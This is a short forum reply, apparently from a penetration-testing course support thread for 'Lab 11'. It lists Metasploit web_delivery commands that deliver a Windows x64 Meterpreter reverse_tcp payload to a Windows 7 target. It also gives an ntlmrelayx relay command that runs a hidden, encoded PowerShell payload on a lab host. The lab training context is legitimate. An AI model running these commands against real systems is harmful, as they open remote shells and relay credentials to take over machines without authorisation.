Lab 11

Hello,
We would need detailed steps/screenshots in order to be able to help you. For this lab with msf6 we need to take into account a few things as the target machine is Windows 7 x64:

  1. There is no AMSI
  2. TLS v1.2 will definitely fail

In metasploit use:

use exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set SRVHOST tap0
set LHOST tap0
set PSH-AMSIBYPASS false
set PSH-FORCETLS12 false
set PSH-ENCODEDCOMMAND true
run -j

If you are having issues with multirelay you can always use ntlmrelayx as follows:

ntlmrelayx.py -t 172.16.23.100 -c "powershell.exe -nop -w hidden -e JABQAD0Ab...."

1 Like